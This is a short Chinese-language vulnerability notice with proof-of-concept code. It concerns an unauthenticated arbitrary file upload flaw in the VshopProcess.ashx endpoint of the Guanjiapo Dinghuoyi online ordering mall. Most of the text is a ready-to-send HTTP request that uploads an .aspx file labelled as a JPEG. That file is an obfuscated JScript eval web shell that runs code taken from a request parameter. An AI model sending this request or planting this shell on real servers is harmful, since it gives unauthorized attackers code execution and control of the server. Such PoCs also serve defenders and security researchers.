漏洞描述
任我行率先针对中小企业推出了管家婆进销存、财务一体化软件。管家婆订货易在线商城是一款帮助传统企业构建专属的B2B订货平台的产品。该平台集成了PC、微信、APP、小程序、H5商城等多个网络渠道,可以无缝对接线下的管家婆ERP系统管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造成代码执行和服务器失陷。
管家婆订货易在线商城 /API/VshopProcess.ashx 文件 action 参数 文件上传漏洞
PoC代码
POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 992
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryirk5kyptosrklo8s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
------WebKitFormBoundaryirk5kyptosrklo8s
Content-Disposition: form-data; name="fileup1i"; filename="pol0qqmknz.aspx"
Content-Type: image/jpeg
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MzYwN'+'jA7dm'+'FyIHN'+'hZmU9'+''+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('SQ=='))+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('bg=='))+char(0x271-0x21b)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('dQ=='))+char(0x250-0x1ed)+''+''+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Mg=='))+char(267-197)+char(0x1874b/0x397)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+char(0xde17/0x2ad)+''+'I7ZXZ'+'hbChS'+'ZXF1Z'+'XN0Lk'+'l0ZW1'+'bJ2Rh'+'eWluZ'+'yddLC'+'BzYWZ'+'lKTsx'+'MDgxO'+'DA7'+'')));%>
------WebKitFormBoundaryirk5kyptosrklo8s--